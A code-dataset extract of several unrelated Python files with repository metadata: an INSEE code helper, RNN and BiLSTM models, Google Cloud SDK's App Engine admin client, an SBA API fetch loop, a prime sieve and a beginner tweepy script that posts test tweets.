] | permissive | Khomille/osm-vs-fantoir | d83cf857db37ef21d2c24c28c5205e1876f5f94c | becd2ea3db24994e3a219db9127ba70306509dc0 | refs/heads/master | 2023-08-19T15:34:58.475507 | 2023-06-10T13:29:06 | 2023-06-10T13:29:06 | 329,862,681 | 0 | 0 | null | 2021-01-17T20:01:10 | 2021-01-15T09:11:50 | null | UTF-8 | Python | false | false | 215 | py |
def get_code_dept_from_insee(code_insee):
    """Return the departement code embedded in a French INSEE commune code.

    Metropolitan codes use a two-character prefix (including '2A'/'2B' for
    Corsica); overseas departements (DOM) start with '97' and use three
    characters.
    """
    if code_insee.startswith('97'):
        return code_insee[:3]
    return code_insee[:2]
def escape_quotes(s):
    """Double every single quote in *s* (SQL-style string escaping)."""
    return "''".join(s.split("'"))
| [
"vdct@laposte.net"
] | vdct@laposte.net |
9f153ffb8255b57b288bac74a5076b641f9ce839 | 355eb0696346912d5b78cad8c2e4d1771ecfc042 | /RNN_MINST/RNN.py | 8abfc9b99ad7a95454df6a6fed2c2a75dc7ace8f | [] | no_license | Btr-bbit/RNN_MINIST | d4e05eb5d1d5be719a61c37b9c18bb79d6e57c49 | 4da143e24ff6ea7fa96ea2236f2fe808b5c8c811 | refs/heads/master | 2020-04-05T17:56:52.600976 | 2018-11-11T13:36:03 | 2018-11-11T13:36:03 | 157,082,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,857 | py | #!/usr/bin/env python
# coding: utf-8
# In[7]:
#coding:utf-8
# Classify the MNIST digit dataset (plenty of tutorials exist for this).
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.contrib import rnn
# Load MNIST with one-hot labels (downloads into ./data on first run).
mnist=input_data.read_data_sets("./data",one_hot=True)

# Hyper-parameters.
train_rate=0.001       # Adam learning rate
train_step=10000       # number of training iterations
batch_size=1280        # examples per mini-batch
display_step=100       # evaluate/print every N steps
frame_size=28          # features per time step (one image row)
sequence_length=28     # time steps per example (number of rows)
hidden_num=100         # hidden units in the RNN cell
n_classes=10           # output classes (digits 0-9)

# Define the input/output placeholders.
x=tf.placeholder(dtype=tf.float32,shape=[None,sequence_length*frame_size],name="inputx")
y=tf.placeholder(dtype=tf.float32,shape=[None,n_classes],name="expected_y")
# Define the output-layer weights and bias.
weights=tf.Variable(tf.truncated_normal(shape=[hidden_num,n_classes]))
bias=tf.Variable(tf.zeros(shape=[n_classes]))
def RNN(x,weights,bias):
    """Run a single-layer RNN over the flattened MNIST rows and return the
    per-class output for the last time step.

    Args:
        x: float tensor [batch, sequence_length*frame_size], flattened images.
        weights: [hidden_num, n_classes] output projection matrix.
        bias: [n_classes] output projection bias.

    Returns:
        [batch, n_classes] unnormalized logits.
    """
    x = tf.reshape(x, shape=[-1, sequence_length, frame_size])
    rnn_cell = tf.nn.rnn_cell.BasicRNNCell(hidden_num)
    # dynamic_rnn creates its own zero initial state; the unused hand-built
    # `init_state` tensor from the previous revision has been removed.
    output, _ = tf.nn.dynamic_rnn(rnn_cell, x, dtype=tf.float32)
    # Bug fix: return raw logits instead of softmax probabilities.  The loss
    # in this file uses tf.nn.softmax_cross_entropy_with_logits, which
    # expects *unscaled* logits and applies softmax internally; feeding it
    # already-softmaxed values applies softmax twice and distorts the
    # gradients.  Accuracy via tf.argmax is unaffected (softmax is monotonic).
    return tf.matmul(output[:, -1, :], weights) + bias
# Build the graph: model output, loss, optimizer and accuracy.
predy=RNN(x,weights,bias)
cost=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=predy,labels=y))
train=tf.train.AdamOptimizer(train_rate).minimize(cost)

# Accuracy: fraction of examples whose arg-max prediction matches the label.
correct_pred=tf.equal(tf.argmax(predy,1),tf.argmax(y,1))
accuracy=tf.reduce_mean(tf.to_float(correct_pred))

sess=tf.Session()
# NOTE(review): tf.initialize_all_variables() is deprecated in favour of
# tf.global_variables_initializer(); kept as-is for this TF version.
sess.run(tf.initialize_all_variables())
step=1
# Fixed held-out batch used for periodic evaluation.
testx,testy=mnist.test.next_batch(batch_size)
while step<train_step:
    batch_x,batch_y=mnist.train.next_batch(batch_size)
# batch_x=tf.reshape(batch_x,shape=[batch_size,sequence_length,frame_size])
    # One optimization step; the loss value is fetched but unused here.
    _loss,__=sess.run([cost,train],feed_dict={x:batch_x,y:batch_y})
    if step % display_step ==0:
        acc,loss=sess.run([accuracy,cost],feed_dict={x:testx,y:testy})
        print(step,acc,loss)
    step+=1
| [
"noreply@github.com"
] | noreply@github.com |
8ae696da4dbd2dc4ad37c45c7cee3aab8b8b3f79 | 2b95f85a141804344a4d7e6414f76d6d8b28dc4d | /src/model/module/encoder/lstm_encoder.py | 9def6f69d84fba8bad53dd03e54e308bd70637f3 | [] | no_license | liangzongchang/pointer-net-for-nested | 3c8b6a854f705c5d270b5059ffc4cba1cee6496a | 4b9c6c82885e3255d0bee1f69acaace52c28d9fe | refs/heads/main | 2023-09-01T07:15:27.677571 | 2021-10-16T14:47:57 | 2021-10-16T14:47:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,087 | py | import torch.nn as nn
from supar.modules import LSTM
from supar.modules.dropout import IndependentDropout, SharedDropout
import torch
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
class LSTMencoder(nn.Module):
    """Bidirectional LSTM encoder over concatenated embeddings.

    ``conf`` is expected to provide: ``embed_dropout_type``, ``embed_dropout``,
    ``before_lstm_dropout``, ``n_lstm_hidden``, ``n_lstm_layers`` and
    ``lstm_dropout`` (assumed from the attributes read below -- confirm
    against the config schema).
    """

    def __init__(self, conf, input_dim, **kwargs):
        super(LSTMencoder, self).__init__()
        self.conf = conf
        # Optional extra dropout right before the LSTM; only created for the
        # 'independent' embedding-dropout flavour.
        # NOTE(review): it is never applied in forward() -- confirm whether
        # that is intentional.
        self.before_lstm_dropout = None
        if self.conf.embed_dropout_type == 'independent':
            self.embed_dropout = IndependentDropout(p=conf.embed_dropout)
            if conf.before_lstm_dropout:
                self.before_lstm_dropout = SharedDropout(p=conf.before_lstm_dropout)
        elif self.conf.embed_dropout_type == 'shared':
            self.embed_dropout = SharedDropout(p=conf.embed_dropout)
        elif self.conf.embed_dropout_type == 'simple':
            self.embed_dropout = nn.Dropout(p=conf.embed_dropout)
        else:
            # Unknown type: fall back to a no-op dropout.
            self.embed_dropout = nn.Dropout(0.)
        self.lstm = LSTM(input_size=input_dim,
                         hidden_size=conf.n_lstm_hidden,
                         num_layers=conf.n_lstm_layers,
                         bidirectional=True,
                         dropout=conf.lstm_dropout)
        self.lstm_dropout = SharedDropout(p=conf.lstm_dropout)

    def forward(self, info):
        """Encode ``info['embed']`` (a dict of embedding tensors) with the
        BiLSTM and store the result under ``info['encoded_emb']``.
        """
        embed = info['embed']
        seq_len = info['seq_len']
        # Idiom fix: list(...) instead of a pass-through comprehension.
        embed = list(embed.values())
        if self.conf.embed_dropout_type == 'independent':
            # IndependentDropout operates on the list of tensors, so drop
            # out first and concatenate afterwards.
            embed = self.embed_dropout(embed)
            embed = torch.cat(embed, dim=-1)
        else:
            embed = torch.cat(embed, dim=-1)
            embed = self.embed_dropout(embed)
        # Hoisted: compute the CPU copy once (was called twice).
        seq_len = seq_len.cpu()
        # Lengths are padded so the packed sequence spans the full padded
        # width, letting total_length below round-trip exactly.
        x = pack_padded_sequence(embed, seq_len + (embed.shape[1] - seq_len.max()), True, False)
        x, _ = self.lstm(x)
        x, _ = pad_packed_sequence(x, True, total_length=embed.shape[1])
        x = self.lstm_dropout(x)
        info['encoded_emb'] = x

    def get_output_dim(self):
        """Output feature size (bidirectional => 2 * hidden size)."""
        return self.conf.n_lstm_hidden * 2
| [
"yangsl@shanghaitech.edu.cn"
] | yangsl@shanghaitech.edu.cn |
b613607484ff4991e3b7a52462661a1989ffd82b | 9b41bd4d829b7b4b5fc7ea2f375089793f34beb0 | /lib/googlecloudsdk/api_lib/app/appengine_client.py | baa0ff95581004e5a3dbd6f42446a6baadea863d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | eyalev/gcloud | 20a596f9cbf7873eaea652a0b2ad080678f1598c | 421ee63a0a6d90a097e8530d53a6df5b905a0205 | refs/heads/master | 2020-12-25T14:48:11.142544 | 2016-06-22T08:43:20 | 2016-06-22T08:43:20 | 61,703,392 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,561 | py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module used by gcloud to communicate with appengine services."""
from __future__ import with_statement
import urllib2
from googlecloudsdk.api_lib.app import logs_requestor
from googlecloudsdk.api_lib.app import util
from googlecloudsdk.api_lib.app import yaml_parsing
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.credentials import devshell as c_devshell
from googlecloudsdk.core.credentials import http
from googlecloudsdk.core.credentials import service_account as c_service_account
from googlecloudsdk.core.credentials import store as c_store
from googlecloudsdk.third_party.appengine.datastore import datastore_index
from googlecloudsdk.third_party.appengine.tools import appengine_rpc_httplib2
from oauth2client.contrib import gce as oauth2client_gce
import yaml
# OAuth2 scopes requested when talking to the App Engine admin console.
APPCFG_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']

# Parameters for reading from the GCE metadata service.
METADATA_BASE = 'http://metadata.google.internal'
SERVICE_ACCOUNT_BASE = ('computeMetadata/v1/instance/service-accounts/default')

# RPC server implementation used for all admin-console calls.
RpcServerClass = appengine_rpc_httplib2.HttpRpcServerOAuth2  # pylint: disable=invalid-name
class Error(exceptions.Error):
  """Base exception for all errors raised by this module."""
  pass
class UnknownConfigType(Error):
  """Raised when asked to update a config type this module does not know."""
  pass
class AppengineClient(object):
    """Client used by gcloud to communicate with appengine services.

    Note: this module targets Python 2 (see the ``except X, e`` and tuple
    parameter unpacking syntax below).

    Attributes:
      server: The appengine server to which requests are sent.
      project: The appengine application in use.
      oauth2_access_token: An existing OAuth2 access token to use.
      oauth2_refresh_token: An existing OAuth2 refresh token to use.
      authenticate_service_account: Authenticate using the default service account
        for the Google Compute Engine VM in which gcloud is being called.
      ignore_bad_certs: Whether to ignore certificate errors when talking to the
        server.
    """

    def __init__(self, server=None, ignore_bad_certs=False):
        self.server = server or 'appengine.google.com'
        self.project = properties.VALUES.core.project.Get(required=True)
        self.ignore_bad_certs = ignore_bad_certs
        # Auth related options
        self.oauth2_access_token = None
        self.oauth2_refresh_token = None
        self.oauth_scopes = APPCFG_SCOPES
        self.authenticate_service_account = False
        self.client_id = None
        self.client_secret = None

        account = properties.VALUES.core.account.Get()
        # This statement will raise a c_store.Error if there is a problem
        # fetching credentials.
        credentials = c_store.Load(account=account)
        # Pick the auth mechanism according to the credential type that the
        # Cloud SDK credential store handed back.
        if isinstance(credentials, c_service_account.ServiceAccountCredentials):
            self.oauth2_access_token = credentials.access_token
            self.client_id = credentials.client_id
            self.client_secret = credentials.client_secret
        elif isinstance(credentials, c_devshell.DevshellCredentials):
            # TODO(user): This passes the access token to use for API calls to
            # appcfg which means that commands that are longer than the lifetime
            # of the access token may fail - e.g. some long deployments. The proper
            # solution is to integrate appcfg closer with the Cloud SDK libraries,
            # this code will go away then and the standard credentials flow will be
            # used.
            self.oauth2_access_token = credentials.access_token
            self.client_id = None
            self.client_secret = None
        elif isinstance(credentials, oauth2client_gce.AppAssertionCredentials):
            # If we are on GCE, use the service account
            self.authenticate_service_account = True
            self.client_id = None
            self.client_secret = None
        else:
            # Otherwise use a stored refresh token
            self.oauth2_refresh_token = credentials.refresh_token
            self.client_id = credentials.client_id
            self.client_secret = credentials.client_secret

    def CleanupIndexes(self, index_yaml):
        """Removes unused datastore indexes.

        Args:
          index_yaml: The parsed yaml file with index data.
        """
        rpcserver = self._GetRpcServer()
        response = rpcserver.Send('/api/datastore/index/diff',
                                  app_id=self.project, payload=index_yaml.ToYAML())
        # The diff endpoint reports both brand-new and no-longer-referenced
        # indexes; only the unused ones are deletion candidates here.
        unused_new_indexes, notused_indexes = (
            datastore_index.ParseMultipleIndexDefinitions(response))

        # Get confirmation from user which indexes should be deleted.
        deletions = datastore_index.IndexDefinitions(indexes=[])
        if notused_indexes.indexes:
            for index in notused_indexes.indexes:
                msg = ('This index is no longer defined in your index.yaml file.\n{0}'
                       .format(str(index.ToYAML())))
                prompt = 'Do you want to delete this index'
                if console_io.PromptContinue(msg, prompt, default=True):
                    deletions.indexes.append(index)

        # Do deletions of confirmed indexes.
        if deletions.indexes:
            response = rpcserver.Send('/api/datastore/index/delete',
                                      app_id=self.project, payload=deletions.ToYAML())
            not_deleted = datastore_index.ParseIndexDefinitions(response)

            # Notify the user when indexes are not deleted.
            if not_deleted.indexes:
                not_deleted_count = len(not_deleted.indexes)
                if not_deleted_count == 1:
                    warning_message = ('An index was not deleted. Most likely this is '
                                       'because it no longer exists.\n\n')
                else:
                    warning_message = ('%d indexes were not deleted. Most likely this '
                                       'is because they no longer exist.\n\n'
                                       % not_deleted_count)
                for index in not_deleted.indexes:
                    warning_message += index.ToYAML()
                log.warning(warning_message)

    def GetLogs(self, service, version, severity, vhost, include_vhost,
                include_all, num_days, end_date, output_file):
        """Get application logs for the given version of the service.

        Args:
          service: str, The service of the app to fetch logs from.
          version: str, The version of the app to fetch logs for.
          severity: int, App log severity to request (0-4); None for request logs
            only.
          vhost: str, The virtual host of log messages to get. None for all hosts.
          include_vhost: bool, If true, the virtual host is included in log
            messages.
          include_all: bool, If true, we add to the log message everything we know
            about the request.
          num_days: int, Number of days worth of logs to export; 0 for all
            available.
          end_date: datetime.date, Date object representing last day of logs to
            return. If None, today is used.
          output_file: Output file name or '-' for standard output.
        """
        rpcserver = self._GetRpcServer()
        requestor = logs_requestor.LogsRequester(
            rpcserver, self.project, service, version, severity, vhost,
            include_vhost, include_all)
        requestor.DownloadLogs(num_days, end_date, output_file)

    def GetLogsAppend(self, service, version, severity, vhost, include_vhost,
                      include_all, end_date, output_file):
        """Get application logs and append them to an existing file.

        Args:
          service: str, The service of the app to fetch logs from.
          version: str, The version of the app to fetch logs for.
          severity: int, App log severity to request (0-4); None for request logs
            only.
          vhost: str, The virtual host of log messages to get. None for all hosts.
          include_vhost: bool, If true, the virtual host is included in log
            messages.
          include_all: bool, If true, we add to the log message everything we know
            about the request.
          end_date: datetime.date, Date object representing last day of logs to
            return. If None, today is used.
          output_file: Output file name or '-' for standard output.
        """
        rpcserver = self._GetRpcServer()
        requestor = logs_requestor.LogsRequester(
            rpcserver, self.project, service, version, severity, vhost,
            include_vhost, include_all)
        requestor.DownloadLogsAppend(end_date, output_file)

    def PrepareVmRuntime(self):
        """Prepare the application for vm runtimes and return state."""
        # More timeout retries than usual: this call can be slow server-side.
        rpcserver = self._GetRpcServer(timeout_max_errors=5)
        rpcserver.Send('/api/vms/prepare', app_id=self.project)

    # TODO(b/29059251): vm_name and instance id are different, this API client
    # needs the VM name. The Zeus API will use instance id instead.
    def SetManagedByGoogle(self, service, version, vm_name=None, wait=True):
        """Sets a service version (and optionally an instance) to Google managed.

        This will reboot the machine and restore the instance with a fresh runtime.

        Args:
          service: str, The service to update.
          version: str, The version of the service to update.
          vm_name: str, The vm name of the instance to update.
          wait: bool, True to wait until it takes effect.
        """
        self._SetManagedBy(service, version, vm_name, '/api/vms/lock', wait)

    def SetManagedBySelf(self, service, version, vm_name=None, wait=True):
        """Sets a service version (optionally a single instance) as self managed.

        This is the 'break the glass' mode that lets you ssh into the machine and
        debug.

        Args:
          service: str, The service to update.
          version: str, The version of the service to update.
          vm_name: str, The vm name of the instance to update.
          wait: bool, True to wait until it takes effect.
        """
        self._SetManagedBy(service, version, vm_name, '/api/vms/debug', wait)

    def _SetManagedBy(self, service, version, vm_name, url, wait):
        """Switches a service version between management modes.

        Args:
          service: str, The service to update.
          version: str, The version of the service to update.
          vm_name: str, The vm name of the instance to update.
          url: str, The URL of the API to call to make the update.
          wait: bool, True to wait until it takes effect.

        Raises:
          Error: if changing the instance debug state failed.
        """
        rpcserver = self._GetRpcServer()
        kwargs = {'app_id': self.project,
                  'version_match': version,
                  'module': service}
        if vm_name:
            kwargs['instance'] = vm_name

        rpcserver.Send(url, **kwargs)
        if wait:
            def GetState():
                yaml_data = rpcserver.Send(
                    '/api/vms/debugstate', app_id=self.project, version_match=version,
                    module=service)
                state = yaml.safe_load(yaml_data)
                done = state['state'] != 'PENDING'
                return (done, (state['state'], state['message']))

            # NOTE: tuple parameter unpacking below is Python 2-only syntax.
            def PrintRetryMessage((unused_state, msg), delay):
                log.status.Print('{0}. Will try again in {1} seconds.'
                                 .format(msg, delay))

            # Poll the debug state until it leaves PENDING: up to 20 tries
            # with exponential backoff starting at 1s, capped at 5s.
            _, (state, message) = util.RetryWithBackoff(
                GetState, PrintRetryMessage, initial_delay=1, backoff_factor=2,
                max_delay=5, max_tries=20)
            if state == 'ERROR':
                raise Error(message)

    def StartService(self, service, version):
        """Starts serving the given version of the service.

        This only works if scaling is set to manual.

        Args:
          service: str, The service to start.
          version: str, The version of the service to start.
        """
        self._GetRpcServer().Send('/api/modules/start', app_id=self.project,
                                  module=service, version=version)

    def StopService(self, service, version):
        """Stop serving the given version of the service.

        This only works if scaling is set to manual.

        Args:
          service: str, The service to stop.
          version: str, The version of the service to stop.
        """
        self._GetRpcServer().Send('/api/modules/stop', app_id=self.project,
                                  module=service, version=version)

    def UpdateConfig(self, config_name, parsed_yaml):
        """Updates any of the supported config file types.

        Args:
          config_name: str, The name of the config to deploy.
          parsed_yaml: The parsed object corresponding to that config type.

        Raises:
          UnknownConfigType: If config_name is not a valid config type.

        Returns:
          Whatever the underlying update methods return.
        """
        if config_name == yaml_parsing.ConfigYamlInfo.CRON:
            return self.UpdateCron(parsed_yaml)
        if config_name == yaml_parsing.ConfigYamlInfo.DISPATCH:
            return self.UpdateDispatch(parsed_yaml)
        if config_name == yaml_parsing.ConfigYamlInfo.DOS:
            return self.UpdateDos(parsed_yaml)
        if config_name == yaml_parsing.ConfigYamlInfo.INDEX:
            return self.UpdateIndexes(parsed_yaml)
        if config_name == yaml_parsing.ConfigYamlInfo.QUEUE:
            return self.UpdateQueues(parsed_yaml)
        raise UnknownConfigType(
            'Config type [{0}] is not a known config type'.format(config_name))

    def UpdateCron(self, cron_yaml):
        """Updates any new or changed cron definitions.

        Args:
          cron_yaml: The parsed yaml file with cron data.
        """
        self._GetRpcServer().Send('/api/cron/update',
                                  app_id=self.project, payload=cron_yaml.ToYAML())

    def UpdateDispatch(self, dispatch_yaml):
        """Updates new or changed dispatch definitions.

        Args:
          dispatch_yaml: The parsed yaml file with dispatch data.
        """
        self._GetRpcServer().Send('/api/dispatch/update',
                                  app_id=self.project,
                                  payload=dispatch_yaml.ToYAML())

    def UpdateDos(self, dos_yaml):
        """Updates any new or changed dos definitions.

        Args:
          dos_yaml: The parsed yaml file with dos data.
        """
        self._GetRpcServer().Send('/api/dos/update',
                                  app_id=self.project, payload=dos_yaml.ToYAML())

    def UpdateIndexes(self, index_yaml):
        """Updates indexes.

        Args:
          index_yaml: The parsed yaml file with index data.
        """
        self._GetRpcServer().Send('/api/datastore/index/add',
                                  app_id=self.project, payload=index_yaml.ToYAML())

    def UpdateQueues(self, queue_yaml):
        """Updates any new or changed task queue definitions.

        Args:
          queue_yaml: The parsed yaml file with queue data.
        """
        self._GetRpcServer().Send('/api/queue/update',
                                  app_id=self.project, payload=queue_yaml.ToYAML())

    def _GetRpcServer(self, timeout_max_errors=2):
        """Returns an instance of an AbstractRpcServer.

        Args:
          timeout_max_errors: How many timeout errors to retry.

        Returns:
          A new AbstractRpcServer, on which RPC calls can be made.
        """
        log.debug('Host: {0}'.format(self.server))

        if self._IsGceEnvironment():
            credentials = oauth2client_gce.AppAssertionCredentials()
        else:
            credentials = None

        # In this case, the get_user_credentials parameters to the RPC server
        # constructor is actually an OAuth2Parameters.
        get_user_credentials = (
            appengine_rpc_httplib2.HttpRpcServerOAuth2.OAuth2Parameters(
                access_token=self.oauth2_access_token,
                client_id=self.client_id,
                client_secret=self.client_secret,
                scope=APPCFG_SCOPES,
                refresh_token=self.oauth2_refresh_token,
                credential_file=None,
                token_uri=None,
                credentials=credentials))
        # Also set gflags flag... this is a bit of a hack.
        if hasattr(appengine_rpc_httplib2.tools, 'FLAGS'):
            appengine_rpc_httplib2.tools.FLAGS.auth_local_webserver = True

        server = RpcServerClass(
            self.server,
            get_user_credentials,
            util.GetUserAgent(),
            util.GetSourceName(),
            host_override=None,
            save_cookies=True,
            auth_tries=3,
            timeout_max_errors=timeout_max_errors,
            account_type='HOSTED_OR_GOOGLE',
            secure=True,
            ignore_certs=self.ignore_bad_certs,
            http_object=http.Http())
        # TODO(user) Hack to avoid failure due to missing cacerts.txt resource.
        server.certpath = None
        # Don't use a cert file if the user passed ignore-bad-certs.
        server.cert_file_available = not self.ignore_bad_certs
        return util.RPCServer(server)

    def _IsGceEnvironment(self):
        """Determine if we are running in a GCE environment.

        Returns:
          True if we are running in a GCE environment.

        Raises:
          Error: The user has requested authentication for a service account but the
            environment is not correct for that to work.
        """
        if self.authenticate_service_account:
            # Avoid hard-to-understand errors later by checking that we have a
            # metadata service (so we are in a GCE VM) and that the VM is configured
            # with access to the appengine.admin scope.
            url = '%s/%s/scopes' % (METADATA_BASE, SERVICE_ACCOUNT_BASE)
            try:
                req = urllib2.Request(url, headers={'Metadata-Flavor': 'Google'})
                vm_scopes_string = urllib2.urlopen(req).read()
            # NOTE: "except X, e" is Python 2-only exception syntax.
            except urllib2.URLError, e:
                raise Error(
                    'Could not obtain scope list from metadata service: %s: %s. This '
                    'may be because we are not running in a Google Compute Engine VM.' %
                    (url, e))
            vm_scopes = vm_scopes_string.split()
            missing = list(set(self.oauth_scopes).difference(vm_scopes))
            if missing:
                raise Error(
                    'You are currently logged into gcloud using a service account '
                    'which does not have the appropriate access to [{0}]. The account '
                    'has the following scopes: [{1}]. It needs [{2}] in order to '
                    'succeed.\nPlease recreate this VM instance with the missing '
                    'scopes. You may also log into a standard account that has the '
                    'appropriate access by using `gcloud auth login`.'
                    .format(self.project, ', '.join(vm_scopes), ', '.join(missing)))
            return True
        else:
            return False
| [
"eyalev@gmail.com"
] | eyalev@gmail.com |
88b055f358acb24661e5028b06b5b3a1db141abd | 855b3ca4261062df8bd465155bbf71debb4cfc4a | /api_requests_loop.py | 248af027122b8724a7b42fce8038a4f655edf436 | [] | no_license | seanbradley/JobTests | 7310f1fbddd4861b446fb89b28aa8c27812efa91 | 6acf2c5ea3bf94209210d5e7ac5061d22a8d4b60 | refs/heads/master | 2021-01-10T18:41:59.486807 | 2015-01-17T22:01:18 | 2015-01-17T22:01:18 | 29,246,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | '''
QUESTION:
Write a function that fetches JSON data returned from an API (in this
example, geographic data from the Small Business Association).
'''
import requests
# Accumulator shared by get_json(); every call appends to this list.
results = []

# Two-letter postal codes for the 50 US states plus DC.
states = [
    "AL", "AK", "AZ", "AR", "CA", "CO", "CT", "DC", "DE", "FL", "GA",
    "HI", "ID", "IL", "IN", "IA", "KS", "KY", "LA", "ME", "MD",
    "MA", "MI", "MN", "MS", "MO", "MT", "NE", "NV", "NH", "NJ",
    "NM", "NY", "NC", "ND", "OH", "OK", "OR", "PA", "RI", "SC",
    "SD", "TN", "TX", "UT", "VT", "VA", "WA", "WV", "WI", "WY"
]
def get_json():
    """Fetch SBA city/county geodata for every state.

    Each state's JSON payload is appended to the module-level ``results``
    list (kept for backward compatibility), so calling this more than once
    appends duplicate entries.

    Returns:
        list: one parsed JSON payload per state, in ``states`` order.
    """
    base_url = "http://api.sba.gov/geodata/city_county_links_for_state_of/"
    # Idiom fix: iterate the state codes directly instead of indexing with
    # range(len(states)).
    for state in states:
        r = requests.get(base_url + state + ".json")
        results.append(r.json())
    return results
# Kick off the download immediately when the module is executed.
get_json()
| [
"sean@blogblimp.com"
] | sean@blogblimp.com |
4595a232fd1799aea5d00a85018eb1cd75e6c634 | 1d2ee3e36c7cfcfac0279b863a34babfbada1b4c | /spoj-200/pos-neg.py | 14f5fd44bd5c1dc68d2edea78dd4e0dcc4bb59ba | [] | no_license | nagarajukusa24/Competitive-Coding | fb186ab1b9c944cd1461e9e3fc6bc65e481661df | 080ce69cc9ab087f1f5a124f377ffa173a73601c | refs/heads/master | 2023-03-18T06:31:13.879618 | 2021-03-10T05:11:53 | 2021-03-10T05:11:53 | 272,482,971 | 2 | 0 | null | 2020-10-23T16:42:14 | 2020-06-15T16:00:01 | C++ | UTF-8 | Python | false | false | 186 | py | t = int(input())
# Classify each of the t input numbers as positive, negative or zero.
while t:
    n = int(input())
    if n > 0:
        print("{} is positive number".format(n))
    elif n < 0:
        print("{} is negative number".format(n))
    else:
        # NOTE(review): prints the literal text "n is zero" (no value),
        # unlike the other branches -- confirm against expected output.
        print("n is zero")
    t -= 1
"nagarajukusa24@gmail.com"
] | nagarajukusa24@gmail.com |
5643825ae66b0749d5819dd56c95da79acd2cb2d | 05c90ad10bd805f168fc960334fa59ac8434af9d | /encryption/sieve.py | 0306ad16240b4c3791c3acd4d9e49491791af84f | [
"MIT"
] | permissive | didim99/FlaskLearning | f3df41d77bbf79554aba6aa0de2c77ed2b791097 | 66d9de3729d372ec548ffbaaaff1d50797467361 | refs/heads/master | 2023-05-13T07:18:54.904336 | 2020-04-03T09:31:12 | 2020-04-03T09:31:12 | 249,192,344 | 0 | 0 | MIT | 2023-05-01T21:22:05 | 2020-03-22T13:44:58 | Python | UTF-8 | Python | false | false | 1,738 | py | # Sieve of Eratosthenes
# Code by David Eppstein, UC Irvine, 28 Feb 2002
# http://code.activestate.com/recipes/117119/
class SieveEratosthenes(object):
    """Incrementally growing sieve of Eratosthenes.

    Based on David Eppstein's lazy sieve (ActiveState recipe 117119): a
    dict maps upcoming composites to the primes witnessing their
    compositeness, so the sieve only advances as far as needed.

    Bug fix over the previous revision: ``D`` and ``primes`` used to be
    *class-level* mutable attributes shared by every instance, and ``fill``
    created a brand-new generator on each call while reusing that shared
    state -- a second ``fill`` therefore restarted at 2 and appended
    duplicate primes.  State is now per-instance and a single persistent
    generator is reused across ``fill`` calls.
    """

    def __init__(self):
        # Primes generated so far, in ascending order.
        self.primes = []
        # One persistent generator, resumed by every fill() call.
        self._gen = self.gen_primes()

    def get(self, index: int):
        """Return the index-th prime generated so far."""
        return self.primes[index]

    def get_size(self):
        """Number of primes generated so far."""
        return len(self.primes)

    def get_last(self):
        """Largest prime generated so far, or 0 if none yet."""
        if not self.primes:
            return 0
        return self.primes[-1]

    def fill(self, max_value):
        """Extend self.primes until the largest prime is >= max_value."""
        while self.get_last() < max_value:
            self.primes.append(next(self._gen))

    def gen_primes(self):
        """Generate an infinite sequence of prime numbers."""
        # Maps composites to primes witnessing their compositeness.  Local
        # to the generator, so every generator owns its own sieve state.
        # This is memory efficient, as the sieve is not "run forward"
        # indefinitely, but only as long as required by the current
        # number being tested.
        witnesses = {}
        # The running integer that's checked for primeness.
        q = 2
        while True:
            if q not in witnesses:
                # q is a new prime.  Yield it and mark its first multiple
                # that isn't already marked in previous iterations.
                yield q
                witnesses[q * q] = [q]
            else:
                # q is composite.  witnesses[q] lists the primes dividing
                # it.  Since we've reached q, we no longer need the entry,
                # but we mark the next multiples of its witnesses to
                # prepare for larger numbers.
                for p in witnesses[q]:
                    witnesses.setdefault(p + q, []).append(p)
                del witnesses[q]
            q += 1
| [
"didim@eclabs.ru"
] | didim@eclabs.ru |
5c4147e18f6cbf6bc084640d1ec95a20dce61064 | 39aee93aba4206153267e611f6bb81343e952c8d | /07-Social_Analytics/3/Unsolved/02-Stu_Recap_Tweet_Analysis/BreakingNews_Unsolved.py | e1d79a11b93ef28b1e3aa988168f06b42a0179cb | [] | no_license | sHongJung/Data_Analytics | 9b357886f6cf15c6b51ad079d7c1af97733346b4 | 5b544e7d090137371d99d7060ac9e36517854a2e | refs/heads/master | 2021-01-25T10:34:37.650233 | 2018-07-25T22:45:29 | 2018-07-25T22:45:29 | 123,358,805 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | # Dependencies
import tweepy
import json
import numpy as np
# Project-local module holding the Twitter credentials, kept out of this
# script so the secrets are not hard-coded here.
import twitter_api as ta
# Import and Initialize Sentiment Analyzer
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
analyzer = SentimentIntensityAnalyzer()
# Twitter API Keys
consumer_key = ta.consumer_key
consumer_secret = ta.consumer_secret
access_token = ta.access_token
access_token_secret = ta.access_token_secret
'''
numbers = [1,2,3,4,5,6]
mean = np.mean(numbers)
print(mean)
'''
# Setup Tweepy API Authentication
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())
# Target Search Term
handles = ['@larry', '@kevin', '@debbie']
# @TODO: UNCOMMENT THE FOLLOWING BLOCK AND COMPLETE THE CODE
# Add List to hold sentiment
# @TODO: YOUR CODE HERE
# Warm-up exercise: posts five numbered tweets from the authenticated
# account.  The sentiment-analysis scaffold below is still to be filled in.
for x in range(5):
    api.update_status("Hey! This is tweet #%s!" %x)
# Grab 25 tweets
# @TODO: YOUR CODE HERE
# Loop through all tweets
# @TODO: YOUR CODE HERE
# Run Vader Analysis on each tweet
